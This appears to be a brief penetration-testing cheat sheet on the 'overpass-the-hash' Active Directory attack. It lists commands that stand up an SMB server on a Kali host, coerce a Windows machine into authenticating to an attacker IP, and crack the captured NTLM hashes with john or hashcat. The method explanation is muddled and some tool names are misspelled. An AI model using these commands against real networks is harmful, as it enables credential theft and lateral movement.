Overpass-the-hash Attack

Using a NT hash to obtain Kerberos tickets

Methodology

https://www.thehacker.recipes/ad/movement/kerberos/ptk

To execute the overpass the hash attack, get NTLM and Password first, and get Kerberos Tickets via NTLM hash and password.

# Kali 
Kali> smbserver.py -smb2support smb .

# Windows 
CMD> type null > hello.txt
CMD> copy hello.txt \\10.10.14.107\smb 

# Kali
vi hashes.txt # and copy and past it 
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# or
hashcat hashes.txt /usr/share/wordlists/rockyou.txt 

Kerberos Tickets

For current user without password, use Rebeus.

For user with password or NTLM hash, you could use Impact tools.

Last updated